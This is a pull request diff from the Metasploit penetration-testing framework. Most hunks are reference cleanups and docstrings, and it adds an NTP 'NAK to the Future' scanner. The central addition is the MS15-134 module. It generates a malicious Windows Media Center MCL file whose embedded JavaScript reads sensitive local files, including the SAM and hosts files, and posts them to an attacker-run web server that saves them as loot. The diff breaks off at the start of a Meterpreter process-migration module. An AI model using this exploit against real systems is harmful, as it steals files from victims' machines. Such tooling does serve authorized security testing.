### PR TITLE
Add Module for Windows Privilege Based Migration

### DIFF
--- a/data/wordlists/sensitive_files_win.txt
+++ b/data/wordlists/sensitive_files_win.txt
@@ -1,7 +1,7 @@
-boot.ini
-config.sys
-autoexec.bat
-Windows\system32\drivers\etc\hosts
-winnt\system32\drivers\etc\hosts
-Windows\system32\config\SAM
-winnt\system32\config\SAM
+C:\boot.ini
+C:\config.sys
+C:\autoexec.bat
+C:\Windows\system32\drivers\etc\hosts
+C:\winnt\system32\drivers\etc\hosts
+C:\Windows\system32\config\SAM
+C:\winnt\system32\config\SAM

--- a/lib/rex/post/meterpreter/client.rb
+++ b/lib/rex/post/meterpreter/client.rb
@@ -112,6 +112,7 @@ class Client
     self.target_id    = opts[:target_id]
     self.capabilities = opts[:capabilities] || {}
     self.commands     = []
+    self.last_checkin = Time.now
 
     self.conn_id      = opts[:conn_id]
     self.url          = opts[:url]

--- a/lib/rex/post/meterpreter/packet_response_waiter.rb
+++ b/lib/rex/post/meterpreter/packet_response_waiter.rb
@@ -15,6 +15,30 @@ module Meterpreter
 ###
 class PacketResponseWaiter
 
+  # Arbitrary argument to {#completion_routine}
+  #
+  # @return [Object,nil]
+  attr_accessor :completion_param
+
+  # A callback to be called when this waiter is notified of a packet's
+  # arrival. If not nil, this will be called with the response packet as first
+  # parameter and {#completion_param} as the second.
+  #
+  # @return [Proc,nil]
+  attr_accessor :completion_routine
+
+  # @return [ConditionVariable]
+  attr_accessor :cond
+
+  # @return [Mutex]
+  attr_accessor :mutex
+
+  # @return [Packet]
+  attr_accessor :response
+
+  # @return [Fixnum] request ID to wait for
+  attr_accessor :rid
+
   #
   # Initializes a response waiter instance for the supplied request
   # identifier.
@@ -43,6 +67,8 @@ class PacketResponseWaiter
   #
   # Notifies the waiter that the supplied response packet has arrived.
   #
+  # @param response [Packet]
+  # @return [void]
   def notify(response)
     if (self.completion_routine)
       self.response = response
@@ -56,9 +82,12 @@ class PacketResponseWaiter
   end
 
   #
-  # Waits for a given time interval for the response packet to arrive.
-  # If the interval is -1 we can wait forever.
+  # Wait for a given time interval for the response packet to arrive.
   #
+  # @param interval [Fixnum,nil] number of seconds to wait, or nil to wait
+  #   forever
+  # @return [Packet,nil] the response, or nil if the interval elapsed before
+  #   receiving one
   def wait(interval)
     interval = nil if interval and interval == -1
     self.mutex.synchronize do
@@ -69,8 +98,6 @@ class PacketResponseWaiter
     return self.response
   end
 
-  attr_accessor :rid, :mutex, :cond, :response # :nodoc:
-  attr_accessor :completion_routine, :completion_param # :nodoc:
 end
 
 end; end; end

--- a/lib/rex/proto/ntp/modes.rb
+++ b/lib/rex/proto/ntp/modes.rb
@@ -92,15 +92,10 @@ module NTP
     end
   end
 
-  class NTPCryptoNAK < BitStruct
-    #    0                   1                   2                   3
-    #    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
-    #   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
-    #   |LI | VN  | mode|    Stratum    |      Poll     |   Precision   |
-    #   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+  class NTPSymmetric < BitStruct
     unsigned :li, 2,  default: 0
     unsigned :version, 3,  default: 3
-    unsigned :mode, 3,  default: 1
+    unsigned :mode, 3,  default: 0
     unsigned :stratum, 8,  default: 0
     unsigned :poll, 8,  default: 0
     unsigned :precision, 8,  default: 0

--- a/lib/rex/proto/ntp/modes.rb
+++ b/lib/rex/proto/ntp/modes.rb
@@ -92,6 +92,28 @@ module NTP
     end
   end
 
+  class NTPCryptoNAK < BitStruct
+    #    0                   1                   2                   3
+    #    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+    #   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    #   |LI | VN  | mode|    Stratum    |      Poll     |   Precision   |
+    #   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    unsigned :li, 2,  default: 0
+    unsigned :version, 3,  default: 3
+    unsigned :mode, 3,  default: 1
+    unsigned :stratum, 8,  default: 0
+    unsigned :poll, 8,  default: 0
+    unsigned :precision, 8,  default: 0
+    unsigned :root_delay, 32,  default: 0
+    unsigned :root_dispersion, 32,  default: 0
+    unsigned :reference_id, 32,  default: 0
+    unsigned :reference_timestamp, 64,  default: 0
+    unsigned :origin_timestamp, 64,  default: 0
+    unsigned :receive_timestamp, 64,  default: 0
+    unsigned :transmit_timestamp, 64,  default: 0
+    rest :payload
+  end
+
   def self.ntp_control(version, operation, payload = nil)
     n = NTPControl.new
     n.version = version

--- a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb
+++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
         [
           [ 'OSVDB', '90733' ],
           [ 'BID', '58231' ],
-          [ 'URL', 'http://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt' ]
+          [ 'PACKETSTORM', '120591' ]
         ],
       'Author'      =>
         [

--- a/modules/auxiliary/admin/http/intersil_pass_reset.rb
+++ b/modules/auxiliary/admin/http/intersil_pass_reset.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
       'References'     =>
         [
           [ 'BID', '25676'],
-          [ 'URL', 'http://packetstormsecurity.org/files/59347/boa-bypass.txt.html']
+          [ 'PACKETSTORM', '59347']
         ],
       'DisclosureDate' => 'Sep 10 2007'))
 

--- a/modules/auxiliary/scanner/http/goahead_traversal.rb
+++ b/modules/auxiliary/scanner/http/goahead_traversal.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
       'References'     =>
         [
           ['CVE', '2014-9707'],
-          ['URL', 'http://packetstormsecurity.com/files/131156/GoAhead-3.4.1-Heap-Overflow-Traversal.html']
+          ['PACKETSTORM', '131156']
         ],
       'Author'         =>
         [

--- a/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb
+++ b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary
           ['EDB', '31262'],
           ['OSVDB', '102656'],
           ['BID', '65199'],
-          ['URL', 'http://packetstormsecurity.com/files/124975/ManageEngine-Support-Center-Plus-7916-Directory-Traversal.html']
+          ['PACKETSTORM', '124975']
         ],
       'DisclosureDate' => "Jan 28 2014"
     ))

--- a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb
+++ b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
       'References'     =>
         [
           ['WPVDB', '8107'],
-          ['URL', 'https://packetstormsecurity.com/files/132750/']
+          ['PACKETSTORM', '132750']
         ],
       'Author'         =>
         [

--- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
@@ -25,6 +25,8 @@ class Metasploit3 < Msf::Auxiliary
       'References'     =>
         [
           [ 'URL', 'http://talosintel.com/reports/TALOS-2015-0069/' ],
+          [ 'URL', 'http://www.cisco.com/c/en/us/support/docs/availability/high-availability/19643-ntpm.html' ],
+          [ 'URL', 'http://support.ntp.org/bin/view/Main/NtpBug2941' ],
           [ 'CVE', '2015-7871' ]
         ]
       )

--- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
     connect_udp
 
     # pick a random 64-bit timestamp
-    canary_timestamp = rand(2**32..2**64-1)
+    canary_timestamp = rand((2**32)..((2**64) - 1))
     probe = build_crypto_nak(canary_timestamp)
     udp_sock.put(probe)
 
@@ -103,10 +103,10 @@ class Metasploit3 < Msf::Auxiliary
       end
     end
 
-    return Exploit::CheckCode::Unknown
+    Exploit::CheckCode::Unknown
   end
 
-  def run_host(ip)
-    fail_with(Failure::Unknown, 'Not yet implemented')
+  def run_host(_ip)
+    check
   end
 end

--- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
@@ -1,0 +1,65 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::Udp
+  include Msf::Auxiliary::UDPScanner
+  include Msf::Auxiliary::NTP
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'NTP "NAK To the Future"',
+      'Description'    => %q(
+        Fill.  This.  In.
+      ),
+      'Author'         =>
+        [
+          'Jon Hart <jon_hart[at]rapid7.com>' # original metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'http://talosintel.com/reports/TALOS-2015-0069/' ],
+          [ 'CVE', '2015-7871' ]
+        ]
+      )
+    )
+
+    register_options(
+    [
+      OptInt.new('OFFSET', [true, "Offset from local time, in seconds", 300]),
+    ], self.class)
+  end
+
+  def scanner_process(data, shost, _sport)
+    @results[shost] ||= []
+    @results[shost] << data
+  end
+
+  def scan_host(ip)
+    probe = Rex::Proto::NTP::NTPCryptoNAK.new
+    probe.stratum = 1
+    probe.poll = 10
+    now = Time.now
+    ts = ((now.to_i + 2208988800 + datastore['OFFSET']) << 32) + now.nsec
+    probe.reference_timestamp = ts
+    probe.origin_timestamp = ts
+    probe.receive_timestamp = ts
+    probe.transmit_timestamp = ts
+    probe.payload = "\x00\x00\x00\x00"
+    scanner_send(probe, ip, datastore['RPORT'])
+  end
+
+  def scanner_prescan(batch)
+    @results = {}
+  end
+
+  def scanner_postscan(_batch)
+    # do something here...
+  end
+end

--- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary
     # pick a random 64-bit timestamp
     canary_timestamp = rand(2**32..2**64-1)
     probe = build_crypto_nak(canary_timestamp)
-    udp_sock.puts(probe)
+    udp_sock.put(probe)
 
     expected_length = probe.length - probe.payload.length
     response = udp_sock.timed_read(expected_length)

--- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
@@ -23,11 +23,12 @@ class Metasploit3 < Msf::Auxiliary
           sends these Crypto-NAK packets in order to establish an association
           between the target ntpd instance and the attacking client.  The end goal
           is to cause ntpd to declare the legitimate peers "false tickers" and
-          choose the attacking client(s) as the preferred peer(s), allowing
+          choose the attacking clients as the preferred peers, allowing
           these peers to control time.
          ),
         'Author'         =>
           [
+            'Matthew Van Gundy of Cisco ASIG', # vulnerability discovery
             'Jon Hart <jon_hart[at]rapid7.com>' # original metasploit module
           ],
         'License'        => MSF_LICENSE,

--- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
@@ -46,13 +46,21 @@ class Metasploit3 < Msf::Auxiliary
     probe.stratum = 1
     probe.poll = 10
     now = Time.now
+    # compute the timestamp.  NTP stores a timestamp as 64-bit unsigned
+    # integer, the high 32-bits representing the number of seconds since era
+    # epoch and the low 32-bits representing the fraction of a second.  The era
+    # epoch in this case is Jan 1 1900, so we must add the number of seconds
+    # between then and the ruby era epoch, Jan 1 1970, which is 2208988800
     ts = ((now.to_i + 2208988800 + datastore['OFFSET']) << 32) + now.nsec
+    # TODO: use different values for each?
     probe.reference_timestamp = ts
     probe.origin_timestamp = ts
     probe.receive_timestamp = ts
     probe.transmit_timestamp = ts
+    # key-id 0
     probe.payload = "\x00\x00\x00\x00"
     scanner_send(probe, ip, datastore['RPORT'])
+    # TODO: whatever is next in order to let us win the race against the other peers
   end
 
   def scanner_prescan(batch)

--- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
@@ -37,13 +37,7 @@ class Metasploit3 < Msf::Auxiliary
             [ 'URL', 'http://www.cisco.com/c/en/us/support/docs/availability/high-availability/19643-ntpm.html' ],
             [ 'URL', 'http://support.ntp.org/bin/view/Main/NtpBug2941' ],
             [ 'CVE', '2015-7871' ]
-          ],
-        'Actions'        =>
-          [
-            ['CHECK', { 'Description' => 'Check for NTP NAK to the future' }],
-            ['SET', { 'Description' => 'Set the time' }]
-          ],
-        'DefaultAction'  => 'CHECK'
+          ]
       )
     )
 
@@ -109,5 +103,9 @@ class Metasploit3 < Msf::Auxiliary
     end
 
     return Exploit::CheckCode::Unknown
+  end
+
+  def run_host(ip)
+    fail_with(Failure::Unknown, 'Not yet implemented')
   end
 end

--- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
@@ -12,30 +12,39 @@ class Metasploit3 < Msf::Auxiliary
   include Msf::Auxiliary::NTP
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'NTP "NAK To the Future"',
-      'Description'    => %q(
-        Fill.  This.  In.
-      ),
-      'Author'         =>
-        [
-          'Jon Hart <jon_hart[at]rapid7.com>' # original metasploit module
-        ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          [ 'URL', 'http://talosintel.com/reports/TALOS-2015-0069/' ],
-          [ 'URL', 'http://www.cisco.com/c/en/us/support/docs/availability/high-availability/19643-ntpm.html' ],
-          [ 'URL', 'http://support.ntp.org/bin/view/Main/NtpBug2941' ],
-          [ 'CVE', '2015-7871' ]
-        ]
+    super(
+      update_info(
+        info,
+        'Name'           => 'NTP "NAK to the Future"',
+        'Description'    => %q(
+          Crypto-NAK packets can be used to cause ntpd to accept time from
+          unauthenticated ephemeral symmetric peers by bypassing the
+          authentication required to mobilize peer associations.  This module
+          sends these Crypto-NAK packets in order to establish an association
+          between the target ntpd instance and the attacking client.  The end goal
+          is to cause ntpd to declare the legitimate peers "false tickers" and
+          choose the attacking client(s) as the preferred peer(s), allowing
+          these peers to control time.
+         ),
+        'Author'         =>
+          [
+            'Jon Hart <jon_hart[at]rapid7.com>' # original metasploit module
+          ],
+        'License'        => MSF_LICENSE,
+        'References'     =>
+          [
+            [ 'URL', 'http://talosintel.com/reports/TALOS-2015-0069/' ],
+            [ 'URL', 'http://www.cisco.com/c/en/us/support/docs/availability/high-availability/19643-ntpm.html' ],
+            [ 'URL', 'http://support.ntp.org/bin/view/Main/NtpBug2941' ],
+            [ 'CVE', '2015-7871' ]
+          ]
       )
     )
 
     register_options(
-    [
-      OptInt.new('OFFSET', [true, "Offset from local time, in seconds", 300]),
-    ], self.class)
+      [
+        OptInt.new('OFFSET', [true, "Offset from local time, in seconds", 300])
+      ], self.class)
   end
 
   def scanner_process(data, shost, _sport)
@@ -63,13 +72,5 @@ class Metasploit3 < Msf::Auxiliary
     probe.payload = "\x00\x00\x00\x00"
     scanner_send(probe, ip, datastore['RPORT'])
     # TODO: whatever is next in order to let us win the race against the other peers
-  end
-
-  def scanner_prescan(batch)
-    @results = {}
-  end
-
-  def scanner_postscan(_batch)
-    # do something here...
   end
 end

--- a/modules/auxiliary/server/ms15_134_mcl_leak.rb
+++ b/modules/auxiliary/server/ms15_134_mcl_leak.rb
@@ -1,0 +1,170 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'cgi'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'MS15-134 Microsoft Windows Media Center MCL Information Disclosure',
+      'Description'    => %q{
+        This module exploits a vulnerability found in Windows Media Center. It allows an MCL
+        file to render itself as a HTML document in the local machine zone by Internet Explorer,
+        which can be used to leak files on the target machine.
+      },
+      'Author'         =>
+        [
+          'Francisco Falcon', # Vuln discovery & PoCs & Detailed write-ups & awesomeness
+          'sinn3r'
+        ],
+      'References'     =>
+        [
+          ['CVE', '2015-6127'],
+          ['MSB', 'MS15-134'],
+          ['URL', 'https://blog.coresecurity.com/2015/12/09/exploiting-windows-media-center/'],
+          ['URL', 'http://www.coresecurity.com/advisories/microsoft-windows-media-center-link-file-incorrectly-resolved-reference']
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => "Dec 8 2015",
+    ))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [true, 'The MCL file', 'msf.mcl']),
+        OptPath.new('FILES',      [true, 'Files you wish to download', ::File.join(Msf::Config.data_directory, 'wordlists', 'sensitive_files_win.txt')])
+      ], self.class)
+  end
+
+  def receiver_page
+    @receiver_page_name ||= Rex::Text.rand_text_alpha(5)
+  end
+
+  def js
+    %Q|
+function sendFile(fname, data) {
+  var xmlHttp = new XMLHttpRequest();
+  if (!xmlHttp) { return 0; }
+  xmlHttp.open('POST', '#{get_uri}/#{receiver_page}', true);
+  xmlHttp.setRequestHeader('Content-type', 'multipart/form-data');
+  xmlHttp.setRequestHeader('Connection', 'close');
+  var body = 'fname=' + encodeURIComponent(fname) + '&data=' + data.toString();
+  xmlHttp.send(body);
+}
+
+function getFile(fname) {
+  var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
+  xmlHttp.open('GET', fname, false);
+  xmlHttp.send();
+  return xmlHttp.responseBody.toArray();
+}
+
+var files = [#{load_file_paths * ","}];
+
+for (var i=0; i < files.length; i++) {
+  try {
+    var data = getFile('file:///' + files[i]);
+    sendFile(files[i], data);
+  } catch (e) {}
+}
+
+    |
+  end
+
+  def generate_mcl
+    %Q|<application url="msf.mcl">
+<html>
+<head>
+<meta http-equiv="x-ua-compatible" content="IE-edge">
+</head>
+<body>
+<script type="text/javascript">
+#{js}
+</script>
+</body>
+</html>
+</application>
+    |
+  end
+
+  def load_file_paths
+    @files ||= lambda {
+      buf = ''
+      ::File.open(datastore['FILES'], 'rb') do |f|
+        buf = f.read
+      end
+      buf.split.map { |n| "\"#{n.gsub!(/\\/, '/')}\"" }
+    }.call
+  end
+
+  def run
+    exploit
+  end
+
+  def start_service(opts = {})
+    super
+    print_status("Generating #{datastore['FILENAME']}...")
+    mcl = generate_mcl
+    file_create(mcl)
+    print_status("Pass #{datastore['FILENAME']} to the target you wish to exploit.")
+    print_status("When the MCL is executed, it should start sending data (files) back")
+    print_status("back to our web server.")
+  end
+
+  def is_ie?(request)
+    fp = fingerprint_user_agent(request.headers['User-Agent'])
+    fp[:ua_name] == HttpClients::IE
+  end
+
+  def parse_data(data)
+    buf = ''
+    data.scan(/\d+/).each do |n|
+      buf << n.to_i.chr
+    end
+    buf
+  end
+
+  def parse_body(body)
+    params = CGI::parse(body)
+
+    {
+      fname: ::File.basename(params['fname'].first),
+      data:  parse_data(params['data'].first)
+    }
+  end
+
+  def on_request_uri(cli, request)
+    unless is_ie?(request)
+      print_error('Client is not Internet Explorer.')
+      send_not_found(cli)
+      return
+    end
+
+    unless /#{receiver_page}/i === request.uri
+      print_error("Unknown request: #{request.uri}")
+      send_not_found(cli)
+      return
+    end
+
+    buff = ''
+
+    print_status("Receiving data...")
+    file = parse_body(request.body.to_s)
+    p = store_loot('mcl.file', 'application/octet-stream', cli.peerhost, file[:data], file[:fname])
+    print_good("#{file[:fname]} saved as: #{p}")
+
+    # If you are kind of lazy to open the saved files, and just sort of want to see the data,
+    # here you go (handy for debugging purposes, but against a larger network this is probably
+    # too much info)
+    vprint_status("File collected: #{file[:fname]}\n\n#{Rex::Text.to_hex_dump(file[:data])}")
+
+  end
+
+end

--- a/modules/auxiliary/server/ms15_134_mcl_leak.rb
+++ b/modules/auxiliary/server/ms15_134_mcl_leak.rb
@@ -17,8 +17,12 @@ class Metasploit3 < Msf::Auxiliary
       'Name'           => 'MS15-134 Microsoft Windows Media Center MCL Information Disclosure',
       'Description'    => %q{
         This module exploits a vulnerability found in Windows Media Center. It allows an MCL
-        file to render itself as a HTML document in the local machine zone by Internet Explorer,
+        file to render itself as an HTML document in the local machine zone by Internet Explorer,
         which can be used to leak files on the target machine.
+
+        Please be aware that if this exploit is used against a patched Windows, it can cause the
+        computer to be very slow or unresponsive (100% CPU). It seems to be related to how the
+        exploit uses the URL attribute in order to render itself as an HTML file.
       },
       'Author'         =>
         [
@@ -115,7 +119,7 @@ for (var i=0; i < files.length; i++) {
     file_create(mcl)
     print_status("Pass #{datastore['FILENAME']} to the target you wish to exploit.")
     print_status("When the MCL is executed, it should start sending data (files) back")
-    print_status("back to our web server.")
+    print_status("to our web server.")
   end
 
   def is_ie?(request)

--- a/modules/auxiliary/server/ms15_134_mcl_leak.rb
+++ b/modules/auxiliary/server/ms15_134_mcl_leak.rb
@@ -79,7 +79,7 @@ for (var i=0; i < files.length; i++) {
   end
 
   def generate_mcl
-    %Q|<application url="msf.mcl">
+    %Q|<application url="#{datastore['FILENAME']}">
 <html>
 <head>
 <meta http-equiv="x-ua-compatible" content="IE-edge">

--- a/modules/exploits/linux/http/linksys_themoon_exec.rb
+++ b/modules/exploits/linux/http/linksys_themoon_exec.rb
@@ -35,8 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'EDB', '31683' ],
           [ 'BID', '65585' ],
           [ 'OSVDB', '103321' ],
-          [ 'URL', 'http://packetstormsecurity.com/files/125253/linksyseseries-exec.txt' ],
-          [ 'URL', 'http://packetstormsecurity.com/files/125252/Linksys-Worm-Remote-Root.html' ],
+          [ 'PACKETSTORM', '125253' ],
+          [ 'PACKETSTORM', '125252' ],
           [ 'URL', 'https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633' ],
           [ 'URL', 'https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Captured/17630' ]
         ],

--- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb
+++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'     => MSF_LICENSE,
       'References'  =>
         [
-          ['URL', 'http://packetstormsecurity.com/files/125754/Loadbalancer.org-Enterprise-VA-7.5.2-Static-SSH-Key.html']
+          ['PACKETSTORM', '125754']
         ],
       'DisclosureDate' => "Mar 17 2014",
       'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },

--- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb
+++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'     => MSF_LICENSE,
       'References'  =>
         [
-          ['URL', 'http://packetstormsecurity.com/files/125755/quantum-root.txt']
+          ['PACKETSTORM', '125755']
         ],
       'DisclosureDate' => "Mar 17 2014",
       'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },

--- a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb
+++ b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb
@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'References'     =>
         [
-          ['URL', 'http://packetstormsecurity.com/files/125760/quantumvmpro-backdoor.txt']
+          ['PACKETSTORM', '125760']
         ],
       'DefaultOptions'  =>
         {

--- a/modules/exploits/multi/browser/java_storeimagearray.rb
+++ b/modules/exploits/multi/browser/java_storeimagearray.rb
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'CVE', '2013-2465' ],
           [ 'OSVDB', '96269' ],
           [ 'EDB', '27526' ],
-          [ 'URL', 'http://packetstormsecurity.com/files/122777/' ],
+          [ 'PACKETSTORM', '122777' ],
           [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040' ]
         ],
       'Platform'      => %w{ java linux win },

--- a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb
+++ b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
           ['OSVDB', '104652'],
           ['OSVDB', '104653'],
           ['OSVDB', '104654'],
-          ['URL', 'http://packetstormsecurity.com/files/125761/Array-Networks-vxAG-xAPV-Privilege-Escalation.html']
+          ['PACKETSTORM', '125761']
         ],
       'DefaultOptions'  =>
         {

--- a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb
+++ b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'OSVDB', '69352' ],
           [ 'CVE', '2010-4335' ],
           [ 'BID', '44852'  ],
-          [ 'URL', 'http://packetstormsecurity.org/files/view/95847/burnedcake.py.txt' ]
+          [ 'PACKETSTORM', '95847' ]
         ],
       'Privileged'     => false,
       'Platform'       => ['php'],

--- a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb
+++ b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'References'      =>
         [
-          [ 'URL', 'http://packetstormsecurity.com/files/123480/ClipBucket-Remote-Code-Execution.html' ]
+          [ 'PACKETSTORM', '123480' ]
         ],
       'Platform'        => ['php'],
       'Arch'            => ARCH_PHP,

--- a/modules/exploits/unix/webapp/instantcms_exec.rb
+++ b/modules/exploits/unix/webapp/instantcms_exec.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'References'     =>
         [
           [ 'BID', '60816' ],
-          [ 'URL', 'http://packetstormsecurity.com/files/122176/InstantCMS-1.6-Code-Execution.html' ]
+          [ 'PACKETSTORM', '122176' ]
         ],
       'Privileged'     => false,
       'Platform'       => 'php',

--- a/modules/exploits/unix/webapp/nagios_graph_explorer.rb
+++ b/modules/exploits/unix/webapp/nagios_graph_explorer.rb
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           [ 'OSVDB', '83552' ],
           [ 'BID', '54263' ],
-          [ 'URL', 'http://packetstormsecurity.org/files/118497/Nagios-XI-Network-Monitor-2011R1.9-OS-Command-Injection.html' ]
+          [ 'PACKETSTORM', '118497' ]
         ],
       'Payload'        =>
         {

--- a/modules/exploits/unix/webapp/projectpier_upload_exec.rb
+++ b/modules/exploits/unix/webapp/projectpier_upload_exec.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           ['OSVDB', '85881'],
           ['EDB', '21929'],
-          ['URL', 'http://packetstormsecurity.org/files/117070/ProjectPier-0.8.8-Shell-Upload.html']
+          ['PACKETSTORM', '117070']
         ],
       'Platform'       => %w{ linux php },
       'Targets'        =>

--- a/modules/exploits/unix/webapp/skybluecanvas_exec.rb
+++ b/modules/exploits/unix/webapp/skybluecanvas_exec.rb
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
           ['OSVDB', '102586'],
           ['BID', '65129'],
           ['EDB', '31183'],
-          ['URL', 'http://packetstormsecurity.com/files/124948/SkyBlueCanvas-CMS-1.1-r248-03-Command-Injection.html']
+          ['PACKETSTORM', '124948']
         ],
       'Privileged'     => false,
       'Payload'        =>

--- a/modules/exploits/unix/webapp/zeroshell_exec.rb
+++ b/modules/exploits/unix/webapp/zeroshell_exec.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'References'      =>
         [
-          [ 'URL', 'http://packetstormsecurity.com/files/122799/ZeroShell-2.0RC2-File-Disclosure-Command-Execution.html' ]
+          [ 'PACKETSTORM', '122799' ]
         ],
       'Platform'        => ['linux'],
       'Arch'            => ARCH_X86,

--- a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
+++ b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'BID', '62793' ],
           [ 'MSB', 'MS13-022' ],
           [ 'MSB', 'MS13-087' ],
-          [ 'URL', 'http://packetstormsecurity.com/files/123731/' ]
+          [ 'PACKETSTORM', '123731' ]
         ],
       'DefaultOptions'  =>
         {

--- a/modules/exploits/windows/http/miniweb_upload_wbem.rb
+++ b/modules/exploits/windows/http/miniweb_upload_wbem.rb
@@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           ['OSVDB', '92198'],
           ['OSVDB', '92200'],
-          ['URL',   'http://dl.packetstormsecurity.net/1304-exploits/miniweb-shelltraversal.txt']
+          ['PACKETSTORM', '121168']
         ],
       'Payload'        =>
         {

--- a/modules/post/windows/manage/priv_migrate.rb
+++ b/modules/post/windows/manage/priv_migrate.rb
@@ -1,0 +1,151 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Post::Windows::Priv
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Windows Manage Privilege Based Process Migration ',
+      'Description'   => %q{ This module will migrate a Meterpreter session based on session privileges.
